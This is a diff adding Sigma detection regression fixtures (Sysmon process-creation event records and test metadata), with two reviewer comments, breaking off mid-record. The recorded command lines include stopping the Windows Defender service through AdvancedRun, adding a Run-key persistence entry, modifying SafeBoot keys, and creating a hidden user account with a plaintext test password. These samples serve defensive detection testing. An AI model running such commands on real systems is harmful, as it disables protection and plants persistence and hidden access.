+ "Version": 5,
+ "Level": 4,
+ "Task": 1,
+ "Opcode": 0,
+ "Keywords": "0x8000000000000000",
+ "TimeCreated": {
+ "#attributes": {
+ "SystemTime": "2025-10-23T10:24:32.948699Z"
+ }
+ },
+ "EventRecordID": 650887,
+ "Correlation": null,
+ "Execution": {
+ "#attributes": {
+ "ProcessID": 3076,
+ "ThreadID": 4936
+ }
+ },
+ "Channel": "Microsoft-Windows-Sysmon/Operational",
+ "Computer": "srv-01.midgardnet.tech",
+ "Security": {
+ "#attributes": {
+ "UserID": "S-1-5-18"
+ }
+ }
+ },
+ "EventData": {
+ "RuleName": "-",
+ "UtcTime": "2025-10-23 10:24:32.936",
+ "ProcessGuid": "14207D89-0260-68FA-9511-000000003F02",
+ "ProcessId": 4220,
+ "Image": "C:\\Users\\SwachchhandaP\\Downloads\\advancedrun-x64\\AdvancedRun.exe",
+ "FileVersion": "1.51",
+ "Description": "Run a program with different settings that you choose.",
+ "Product": "AdvancedRun",
+ "Company": "NirSoft",
+ "OriginalFileName": "AdvancedRun.exe",
+ "CommandLine": "\"C:\\Users\\SwachchhandaP\\Downloads\\advancedrun-x64\\AdvancedRun.exe\"",
+ "CurrentDirectory": "C:\\Users\\SwachchhandaP\\Downloads\\advancedrun-x64\\",
+ "User": "MIDGARDNET\\SwachchhandaP",
+ "LogonGuid": "14207D89-91E6-68F9-0F94-460000000000",
+ "LogonId": "0x46940f",
+ "TerminalSessionId": 2,
+ "IntegrityLevel": "Medium",
+ "Hashes": "MD5=3F44DD7F287DA4A9A1BE82E5178B7DC8,SHA256=E8000766C215B2DF493C0AA0D8FA29FAE04B1D0730AD1E7D7626484DC9D7B225,IMPHASH=65F94FEE8F6FA846B2B29BDD0721C096",
+ "ParentProcessGuid": "14207D89-91E9-68F9-E104-000000003F02",
+ "ParentProcessId": 452,
+ "ParentImage": "C:\\Windows\\explorer.exe",
+ "ParentCommandLine": "C:\\Windows\\Explorer.EXE",
+ "ParentUser": "MIDGARDNET\\SwachchhandaP"
+ }
+ }
+}
diff --git a/regression_data/windows/process_creation/proc_creation_win_pua_advancedrun/info.yml b/regression_data/windows/process_creation/proc_creation_win_pua_advancedrun/info.yml
new file mode 100644
index 000000000..29944dc6d
--- /dev/null
+++ b/regression_data/windows/process_creation/proc_creation_win_pua_advancedrun/info.yml
@@ -0,0 +1,13 @@
+id: 5f4db274-e3e6-45cd-a5a3-ef03f678dd28
+description: N/A
+date: 2025-10-24
+author: SigmaHQ Team
+rule_metadata:
+ - id: d2b749ee-4225-417e-b20e-a8d2193cbb84
+ title: PUA - AdvancedRun Execution
+regression_tests_info:
+ - name: Positive Detection Test
+ type: evtx
+ provider: Microsoft-Windows-Sysmon
+ match_count: 1
+ path: regression_data/windows/process_creation/proc_creation_win_pua_advancedrun/d2b749ee-4225-417e-b20e-a8d2193cbb84.evtx
diff --git a/regression_data/windows/process_creation/proc_creation_win_pua_advancedrun_priv_user/fa00b701-44c6-4679-994d-5a18afa8a707.evtx b/regression_data/windows/process_creation/proc_creation_win_pua_advancedrun_priv_user/fa00b701-44c6-4679-994d-5a18afa8a707.evtx
new file mode 100644
index 000000000..1572f756f
Binary files /dev/null and b/regression_data/windows/process_creation/proc_creation_win_pua_advancedrun_priv_user/fa00b701-44c6-4679-994d-5a18afa8a707.evtx differ
diff --git a/regression_data/windows/process_creation/proc_creation_win_pua_advancedrun_priv_user/fa00b701-44c6-4679-994d-5a18afa8a707.json b/regression_data/windows/process_creation/proc_creation_win_pua_advancedrun_priv_user/fa00b701-44c6-4679-994d-5a18afa8a707.json
new file mode 100644
index 000000000..441bba366
--- /dev/null
+++ b/regression_data/windows/process_creation/proc_creation_win_pua_advancedrun_priv_user/fa00b701-44c6-4679-994d-5a18afa8a707.json
@@ -0,0 +1,66 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-23T10:19:13.088214Z" + } + }, + "EventRecordID": 650834, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3076, + "ThreadID": 4936 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "srv-01.midgardnet.tech", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-23 10:19:13.085", + "ProcessGuid": "14207D89-0121-68FA-6E11-000000003F02", + "ProcessId": 6448, + "Image": "C:\\Users\\SwachchhandaP\\Downloads\\advancedrun-x64\\AdvancedRun.exe", + "FileVersion": "1.51", + "Description": "Run a program with different settings that you choose.", + "Product": "AdvancedRun", + "Company": "NirSoft", + "OriginalFileName": "AdvancedRun.exe", + "CommandLine": "AdvancedRun.exe /EXEFilename \"C:\\Windows\\System32\\sc.exe\" /WindowState 0 /CommandLine \"stop WinDefend\" /StartDirectory \"\" /RunAs 8 /Run", + "CurrentDirectory": "C:\\Users\\SwachchhandaP\\Downloads\\advancedrun-x64\\", + "User": "MIDGARDNET\\SwachchhandaP", + "LogonGuid": "14207D89-91E6-68F9-0F94-460000000000", + "LogonId": "0x46940f", + "TerminalSessionId": 2, + "IntegrityLevel": "Medium", + "Hashes": "MD5=3F44DD7F287DA4A9A1BE82E5178B7DC8,SHA256=E8000766C215B2DF493C0AA0D8FA29FAE04B1D0730AD1E7D7626484DC9D7B225,IMPHASH=65F94FEE8F6FA846B2B29BDD0721C096", + "ParentProcessGuid": "14207D89-00ED-68FA-6611-000000003F02", + "ParentProcessId": 700, + "ParentImage": "C:\\Windows\\System32\\cmd.exe", + "ParentCommandLine": "\"C:\\Windows\\System32\\cmd.exe\"", + 
"ParentUser": "MIDGARDNET\\SwachchhandaP" + } + } +} diff --git a/regression_data/windows/process_creation/proc_creation_win_pua_advancedrun_priv_user/info.yml b/regression_data/windows/process_creation/proc_creation_win_pua_advancedrun_priv_user/info.yml new file mode 100644 index 000000000..0765e7710 --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_pua_advancedrun_priv_user/info.yml @@ -0,0 +1,13 @@ +id: 0f52b7ec-72e4-4362-acf5-b5558ff58323 +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: fa00b701-44c6-4679-994d-5a18afa8a707 + title: PUA - AdvancedRun Suspicious Execution +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/windows/process_creation/proc_creation_win_pua_advancedrun_priv_user/fa00b701-44c6-4679-994d-5a18afa8a707.evtx diff --git a/regression_data/windows/process_creation/proc_creation_win_reg_add_run_key/de587dce-915e-4218-aac4-835ca6af6f70.evtx b/regression_data/windows/process_creation/proc_creation_win_reg_add_run_key/de587dce-915e-4218-aac4-835ca6af6f70.evtx new file mode 100644 index 000000000..374fc3367 Binary files /dev/null and b/regression_data/windows/process_creation/proc_creation_win_reg_add_run_key/de587dce-915e-4218-aac4-835ca6af6f70.evtx differ diff --git a/regression_data/windows/process_creation/proc_creation_win_reg_add_run_key/de587dce-915e-4218-aac4-835ca6af6f70.json b/regression_data/windows/process_creation/proc_creation_win_reg_add_run_key/de587dce-915e-4218-aac4-835ca6af6f70.json new file mode 100644 index 000000000..0d846f7a7 --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_reg_add_run_key/de587dce-915e-4218-aac4-835ca6af6f70.json 
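Review bot: `description: N/A` hides the one thing that makes this fixture interesting: the preceding JSON shows the evtx captures `AdvancedRun.exe /EXEFilename "C:\Windows\System32\sc.exe" ... /CommandLine "stop WinDefend" ... /RunAs 8 /Run`, i.e. a Defender service stop launched through AdvancedRun's elevated run mode from a Downloads folder at Medium integrity. Suggest `description: Sysmon EID 1 - AdvancedRun.exe launching sc.exe "stop WinDefend" with /RunAs 8 (NirSoft's TrustedInstaller mode, if I read the AdvancedRun docs right) from a user Downloads folder`. Because the same event also carries the `stop WinDefend` string, it will presumably satisfy Defender-tampering rules as well; if `match_count` is evaluated per listed rule only, that is fine, but a remark in `description` would stop someone from later "fixing" a second match as a false positive.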
@@ -0,0 +1,66 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-22T20:35:26.043284Z" + } + }, + "EventRecordID": 256890, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3168, + "ThreadID": 4580 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-1", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-22 20:35:26.041", + "ProcessGuid": "5AB40FD1-400E-68F9-6331-000000003B02", + "ProcessId": 6032, + "Image": "C:\\Windows\\System32\\reg.exe", + "FileVersion": "10.0.20348.1 (WinBuild.160101.0800)", + "Description": "Registry Console Tool", + "Product": "Microsoft® Windows® Operating System", + "Company": "Microsoft Corporation", + "OriginalFileName": "reg.exe", + "CommandLine": "REG ADD \"HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\" /V \"softoz\" /t REG_SZ /F /D \"C:\\Users\\admin\\AppData\\Roaming\\sihostt.exe\"", + "CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\testdata\\", + "User": "AR-WIN-1\\Administrator", + "LogonGuid": "5AB40FD1-8D74-68F7-E44B-100000000000", + "LogonId": "0x104be4", + "TerminalSessionId": 2, + "IntegrityLevel": "High", + "Hashes": "MD5=EB20E119AAF500E2752DC5A588B54C12,SHA256=C6A168C81654F5901E864C8FD61FA54F084CD8B2E0A8AC1B83EACF9EB4484F75,IMPHASH=E23A24F7BA9B35B3E9706724F6749860", + "ParentProcessGuid": "5AB40FD1-3E0C-68F9-1731-000000003B02", + "ParentProcessId": 8252, + "ParentImage": "C:\\Windows\\System32\\cmd.exe", + "ParentCommandLine": "\"C:\\Windows\\system32\\cmd.exe\"", + "ParentUser": 
"AR-WIN-1\\Administrator" + } + } +} diff --git a/regression_data/windows/process_creation/proc_creation_win_reg_add_run_key/info.yml b/regression_data/windows/process_creation/proc_creation_win_reg_add_run_key/info.yml new file mode 100644 index 000000000..c196ea8c7 --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_reg_add_run_key/info.yml @@ -0,0 +1,13 @@ +id: e60e5322-dc51-4969-be3b-12caad8a9276 +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: de587dce-915e-4218-aac4-835ca6af6f70 + title: Potential Persistence Attempt Via Run Keys Using Reg.EXE +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/windows/process_creation/proc_creation_win_reg_add_run_key/de587dce-915e-4218-aac4-835ca6af6f70.evtx diff --git a/regression_data/windows/process_creation/proc_creation_win_reg_add_safeboot/d7662ff6-9e97-4596-a61d-9839e32dee8d.evtx b/regression_data/windows/process_creation/proc_creation_win_reg_add_safeboot/d7662ff6-9e97-4596-a61d-9839e32dee8d.evtx new file mode 100644 index 000000000..cb3ddab44 Binary files /dev/null and b/regression_data/windows/process_creation/proc_creation_win_reg_add_safeboot/d7662ff6-9e97-4596-a61d-9839e32dee8d.evtx differ diff --git a/regression_data/windows/process_creation/proc_creation_win_reg_add_safeboot/d7662ff6-9e97-4596-a61d-9839e32dee8d.json b/regression_data/windows/process_creation/proc_creation_win_reg_add_safeboot/d7662ff6-9e97-4596-a61d-9839e32dee8d.json new file mode 100644 index 000000000..1d89262b1 --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_reg_add_safeboot/d7662ff6-9e97-4596-a61d-9839e32dee8d.json 
@@ -0,0 +1,66 @@
+{
+ "Event": {
+ "#attributes": {
+ "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event"
+ },
+ "System": {
+ "Provider": {
+ "#attributes": {
+ "Name": "Microsoft-Windows-Sysmon",
+ "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9"
+ }
+ },
+ "EventID": 1,
+ "Version": 5,
+ "Level": 4,
+ "Task": 1,
+ "Opcode": 0,
+ "Keywords": "0x8000000000000000",
+ "TimeCreated": {
+ "#attributes": {
+ "SystemTime": "2025-10-22T20:38:06.571958Z"
+ }
+ },
+ "EventRecordID": 256915,
+ "Correlation": null,
+ "Execution": {
+ "#attributes": {
+ "ProcessID": 3168,
+ "ThreadID": 4580
+ }
+ },
+ "Channel": "Microsoft-Windows-Sysmon/Operational",
+ "Computer": "ar-win-1",
+ "Security": {
+ "#attributes": {
+ "UserID": "S-1-5-18"
+ }
+ }
+ },
+ "EventData": {
+ "RuleName": "-",
+ "UtcTime": "2025-10-22 20:38:06.570",
+ "ProcessGuid": "5AB40FD1-40AE-68F9-7631-000000003B02",
+ "ProcessId": 2456,
+ "Image": "C:\\Windows\\System32\\reg.exe",
+ "FileVersion": "10.0.20348.1 (WinBuild.160101.0800)",
+ "Description": "Registry Console Tool",
+ "Product": "Microsoft® Windows® Operating System",
+ "Company": "Microsoft Corporation",
+ "OriginalFileName": "reg.exe",
+ "CommandLine": "reg copy hklm\\system\\CurrentControlSet\\services\\acpi hklm\\system\\CurrentControlSet\\control\\safeboot\\network\\nas /s /f",
+ "CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\testdata\\",
+ "User": "AR-WIN-1\\Administrator",
+ "LogonGuid": "5AB40FD1-8D74-68F7-E44B-100000000000",
+ "LogonId": "0x104be4",
+ "TerminalSessionId": 2,
+ "IntegrityLevel": "High",
+ "Hashes": "MD5=EB20E119AAF500E2752DC5A588B54C12,SHA256=C6A168C81654F5901E864C8FD61FA54F084CD8B2E0A8AC1B83EACF9EB4484F75,IMPHASH=E23A24F7BA9B35B3E9706724F6749860",
+ "ParentProcessGuid": "5AB40FD1-3E0C-68F9-1731-000000003B02",
+ "ParentProcessId": 8252,
+ "ParentImage": "C:\\Windows\\System32\\cmd.exe",
+ "ParentCommandLine": "\"C:\\Windows\\system32\\cmd.exe\"",
+ "ParentUser": "AR-WIN-1\\Administrator"
+ }
+ }
+}
diff --git a/regression_data/windows/process_creation/proc_creation_win_reg_add_safeboot/info.yml b/regression_data/windows/process_creation/proc_creation_win_reg_add_safeboot/info.yml
new file mode 100644
index 000000000..1359c9d38
--- /dev/null
+++ b/regression_data/windows/process_creation/proc_creation_win_reg_add_safeboot/info.yml
@@ -0,0 +1,13 @@
+id: 6f781d8b-1b6c-408b-a90d-08aceb2a14d0
+description: N/A
+date: 2025-10-24
+author: SigmaHQ Team
+rule_metadata:
+ - id: d7662ff6-9e97-4596-a61d-9839e32dee8d
+ title: Add SafeBoot Keys Via Reg Utility
+regression_tests_info:
+ - name: Positive Detection Test
+ type: evtx
+ provider: Microsoft-Windows-Sysmon
+ match_count: 1
+ path: regression_data/windows/process_creation/proc_creation_win_reg_add_safeboot/d7662ff6-9e97-4596-a61d-9839e32dee8d.evtx
diff --git a/regression_data/windows/process_creation/proc_creation_win_registry_special_accounts_hide_user/9ec9fb1b-e059-4489-9642-f270c207923d.evtx b/regression_data/windows/process_creation/proc_creation_win_registry_special_accounts_hide_user/9ec9fb1b-e059-4489-9642-f270c207923d.evtx
new file mode 100644
index 000000000..81684555a
Binary files /dev/null and b/regression_data/windows/process_creation/proc_creation_win_registry_special_accounts_hide_user/9ec9fb1b-e059-4489-9642-f270c207923d.evtx differ
diff --git a/regression_data/windows/process_creation/proc_creation_win_registry_special_accounts_hide_user/9ec9fb1b-e059-4489-9642-f270c207923d.json b/regression_data/windows/process_creation/proc_creation_win_registry_special_accounts_hide_user/9ec9fb1b-e059-4489-9642-f270c207923d.json
new file mode 100644
index 000000000..0ddd2e498
--- /dev/null
+++ b/regression_data/windows/process_creation/proc_creation_win_registry_special_accounts_hide_user/9ec9fb1b-e059-4489-9642-f270c207923d.json
@@ -0,0 +1,66 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-31T05:06:45.367278Z" + } + }, + "EventRecordID": 657153, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3080, + "ThreadID": 4948 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "srv-01.midgardnet.tech", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-31 05:06:45.364", + "ProcessGuid": "14207D89-43E5-6904-4506-000000004002", + "ProcessId": 5244, + "Image": "C:\\Windows\\System32\\reg.exe", + "FileVersion": "10.0.20348.1 (WinBuild.160101.0800)", + "Description": "Registry Console Tool", + "Product": "Microsoft® Windows® Operating System", + "Company": "Microsoft Corporation", + "OriginalFileName": "reg.exe", + "CommandLine": "REG ADD \"HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\Userlist\" /v AtomicOperator$ /t REG_DWORD /d 0", + "CurrentDirectory": "C:\\Users\\SWACHC~1\\AppData\\Local\\Temp\\", + "User": "MIDGARDNET\\SwachchhandaP", + "LogonGuid": "14207D89-34DD-6904-8287-190000000000", + "LogonId": "0x198782", + "TerminalSessionId": 2, + "IntegrityLevel": "High", + "Hashes": "MD5=EB20E119AAF500E2752DC5A588B54C12,SHA256=C6A168C81654F5901E864C8FD61FA54F084CD8B2E0A8AC1B83EACF9EB4484F75,IMPHASH=E23A24F7BA9B35B3E9706724F6749860", + "ParentProcessGuid": "14207D89-43E5-6904-4106-000000004002", + "ParentProcessId": 6656, + "ParentImage": "C:\\Windows\\System32\\cmd.exe", + "ParentCommandLine": "\"cmd.exe\" /c NET USER AtomicOperator$ At0micRedTeam! 
/ADD /expires:never & REG ADD \"HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\Userlist\" /v AtomicOperator$ /t REG_DWORD /d 0", + "ParentUser": "MIDGARDNET\\SwachchhandaP" + } + } +} diff --git a/regression_data/windows/process_creation/proc_creation_win_registry_special_accounts_hide_user/info.yml b/regression_data/windows/process_creation/proc_creation_win_registry_special_accounts_hide_user/info.yml new file mode 100644 index 000000000..8b2a1c592 --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_registry_special_accounts_hide_user/info.yml @@ -0,0 +1,13 @@ +id: de8dc72e-19eb-465a-83ac-59545ae56426 +description: N/A +date: 2025-10-31 +author: SigmaHQ Team +rule_metadata: + - id: 9ec9fb1b-e059-4489-9642-f270c207923d + title: Hiding User Account Via SpecialAccounts Registry Key - CommandLine +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/windows/process_creation/proc_creation_win_registry_special_accounts_hide_user/9ec9fb1b-e059-4489-9642-f270c207923d.evtx diff --git a/regression_data/windows/process_creation/proc_creation_win_renamed_adfind/df55196f-f105-44d3-a675-e9dfb6cc2f2b.evtx b/regression_data/windows/process_creation/proc_creation_win_renamed_adfind/df55196f-f105-44d3-a675-e9dfb6cc2f2b.evtx new file mode 100644 index 000000000..0d04a62fd Binary files /dev/null and b/regression_data/windows/process_creation/proc_creation_win_renamed_adfind/df55196f-f105-44d3-a675-e9dfb6cc2f2b.evtx differ diff --git a/regression_data/windows/process_creation/proc_creation_win_renamed_adfind/df55196f-f105-44d3-a675-e9dfb6cc2f2b.json b/regression_data/windows/process_creation/proc_creation_win_renamed_adfind/df55196f-f105-44d3-a675-e9dfb6cc2f2b.json new file mode 100644 index 000000000..4212ed2dd --- /dev/null 
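Review bot: The `ParentCommandLine` of this fixture embeds a plaintext password for the `AtomicOperator$` account it creates, together with a non-lab FQDN (`srv-01.midgardnet.tech`) and a personal account name in `User`/`ParentUser`, whereas every other process-creation fixture in this change was captured on the `ar-win-1` range host as `AR-WIN-1\Administrator`. Even as a disposable test value, a committed credential will trip secret scanners on a public repository, and the hostname and user name tie the fixture to a named environment for no detection benefit. Re-capturing the event on the shared lab host would fix both; failing that, the matching info.yml (currently `description: N/A`) should state that the credential is a throwaway Atomic test value. The .evtx next to this .json presumably carries the same strings, so editing the JSON alone would not sanitize the fixture.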
+++ b/regression_data/windows/process_creation/proc_creation_win_renamed_adfind/df55196f-f105-44d3-a675-e9dfb6cc2f2b.json @@ -0,0 +1,66 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-22T20:26:58.441823Z" + } + }, + "EventRecordID": 256793, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3168, + "ThreadID": 4580 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-1", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-22 20:26:58.421", + "ProcessGuid": "5AB40FD1-3E12-68F9-1A31-000000003B02", + "ProcessId": 6856, + "Image": "C:\\Users\\Administrator\\Downloads\\testdata\\renamed-AdFind.exe", + "FileVersion": "1.52.0.5064", + "Description": "-", + "Product": "AdFind", + "Company": "www.joeware.net", + "OriginalFileName": "AdFind.exe", + "CommandLine": "renamed-AdFind.exe", + "CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\testdata\\", + "User": "AR-WIN-1\\Administrator", + "LogonGuid": "5AB40FD1-8D74-68F7-E44B-100000000000", + "LogonId": "0x104be4", + "TerminalSessionId": 2, + "IntegrityLevel": "High", + "Hashes": "MD5=12011C44955FD6631113F68A99447515,SHA256=C92C158D7C37FEA795114FA6491FE5F145AD2F8C08776B18AE79DB811E8E36A3,IMPHASH=12CE1C0F3F5837ECC18A3782408FA975", + "ParentProcessGuid": "5AB40FD1-3E0C-68F9-1731-000000003B02", + "ParentProcessId": 8252, + "ParentImage": "C:\\Windows\\System32\\cmd.exe", + "ParentCommandLine": "\"C:\\Windows\\system32\\cmd.exe\"", + "ParentUser": "AR-WIN-1\\Administrator" + } + } +} 
diff --git a/regression_data/windows/process_creation/proc_creation_win_renamed_adfind/info.yml b/regression_data/windows/process_creation/proc_creation_win_renamed_adfind/info.yml
new file mode 100644
index 000000000..535f0a655
--- /dev/null
+++ b/regression_data/windows/process_creation/proc_creation_win_renamed_adfind/info.yml
@@ -0,0 +1,13 @@
+id: 09eb713e-f4b1-42ce-9c8e-d446ba0d548a
+description: N/A
+date: 2025-10-24
+author: SigmaHQ Team
+rule_metadata:
+ - id: df55196f-f105-44d3-a675-e9dfb6cc2f2b
+ title: Renamed AdFind Execution
+regression_tests_info:
+ - name: Positive Detection Test
+ type: evtx
+ provider: Microsoft-Windows-Sysmon
+ match_count: 1
+ path: regression_data/windows/process_creation/proc_creation_win_renamed_adfind/df55196f-f105-44d3-a675-e9dfb6cc2f2b.evtx
diff --git a/regression_data/windows/process_creation/proc_creation_win_renamed_binary/36480ae1-a1cb-4eaa-a0d6-29801d7e9142.evtx b/regression_data/windows/process_creation/proc_creation_win_renamed_binary/36480ae1-a1cb-4eaa-a0d6-29801d7e9142.evtx
new file mode 100644
index 000000000..a445e6016
Binary files /dev/null and b/regression_data/windows/process_creation/proc_creation_win_renamed_binary/36480ae1-a1cb-4eaa-a0d6-29801d7e9142.evtx differ
diff --git a/regression_data/windows/process_creation/proc_creation_win_renamed_binary/36480ae1-a1cb-4eaa-a0d6-29801d7e9142.json b/regression_data/windows/process_creation/proc_creation_win_renamed_binary/36480ae1-a1cb-4eaa-a0d6-29801d7e9142.json
new file mode 100644
index 000000000..9e76fe811
--- /dev/null
+++ b/regression_data/windows/process_creation/proc_creation_win_renamed_binary/36480ae1-a1cb-4eaa-a0d6-29801d7e9142.json
@@ -0,0 +1,66 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-22T20:29:25.275782Z" + } + }, + "EventRecordID": 256823, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3168, + "ThreadID": 4580 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-1", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-22 20:29:25.272", + "ProcessGuid": "5AB40FD1-3EA5-68F9-2F31-000000003B02", + "ProcessId": 4564, + "Image": "C:\\Users\\Administrator\\Downloads\\testdata\\renamed-netsh.exe", + "FileVersion": "10.0.20348.1 (WinBuild.160101.0800)", + "Description": "Network Command Shell", + "Product": "Microsoft® Windows® Operating System", + "Company": "Microsoft Corporation", + "OriginalFileName": "netsh.exe", + "CommandLine": "renamed-netsh.exe", + "CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\testdata\\", + "User": "AR-WIN-1\\Administrator", + "LogonGuid": "5AB40FD1-8D74-68F7-E44B-100000000000", + "LogonId": "0x104be4", + "TerminalSessionId": 2, + "IntegrityLevel": "High", + "Hashes": "MD5=28B5A3688253FD5822EE90BCAE2633F7,SHA256=7482890B1875BDCEC826F3385EAC7DCDC38F17358A13B1B8C790BDB895FF5054,IMPHASH=06F091DBEC9C3F0DD14808FFE59B95DE", + "ParentProcessGuid": "5AB40FD1-3E0C-68F9-1731-000000003B02", + "ParentProcessId": 8252, + "ParentImage": "C:\\Windows\\System32\\cmd.exe", + "ParentCommandLine": "\"C:\\Windows\\system32\\cmd.exe\"", + "ParentUser": "AR-WIN-1\\Administrator" + } + } +} 
diff --git a/regression_data/windows/process_creation/proc_creation_win_renamed_binary/info.yml b/regression_data/windows/process_creation/proc_creation_win_renamed_binary/info.yml
new file mode 100644
index 000000000..1decc3d31
--- /dev/null
+++ b/regression_data/windows/process_creation/proc_creation_win_renamed_binary/info.yml
@@ -0,0 +1,13 @@
+id: e9861f82-77a9-4f8b-a418-0fbb6019588b
+description: N/A
+date: 2025-10-24
+author: SigmaHQ Team
+rule_metadata:
+ - id: 36480ae1-a1cb-4eaa-a0d6-29801d7e9142
+ title: Potential Defense Evasion Via Binary Rename
+regression_tests_info:
+ - name: Positive Detection Test
+ type: evtx
+ provider: Microsoft-Windows-Sysmon
+ match_count: 1
+ path: regression_data/windows/process_creation/proc_creation_win_renamed_binary/36480ae1-a1cb-4eaa-a0d6-29801d7e9142.evtx
diff --git a/regression_data/windows/process_creation/proc_creation_win_renamed_binary_highly_relevant/0ba1da6d-b6ce-4366-828c-18826c9de23e.evtx b/regression_data/windows/process_creation/proc_creation_win_renamed_binary_highly_relevant/0ba1da6d-b6ce-4366-828c-18826c9de23e.evtx
new file mode 100644
index 000000000..f673a38d5
Binary files /dev/null and b/regression_data/windows/process_creation/proc_creation_win_renamed_binary_highly_relevant/0ba1da6d-b6ce-4366-828c-18826c9de23e.evtx differ
diff --git a/regression_data/windows/process_creation/proc_creation_win_renamed_binary_highly_relevant/0ba1da6d-b6ce-4366-828c-18826c9de23e.json b/regression_data/windows/process_creation/proc_creation_win_renamed_binary_highly_relevant/0ba1da6d-b6ce-4366-828c-18826c9de23e.json
new file mode 100644
index 000000000..679f6bc4a
--- /dev/null
+++ b/regression_data/windows/process_creation/proc_creation_win_renamed_binary_highly_relevant/0ba1da6d-b6ce-4366-828c-18826c9de23e.json
@@ -0,0 +1,66 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-22T20:28:22.116872Z" + } + }, + "EventRecordID": 256810, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3168, + "ThreadID": 4580 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-1", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-22 20:28:22.113", + "ProcessGuid": "5AB40FD1-3E66-68F9-2831-000000003B02", + "ProcessId": 4832, + "Image": 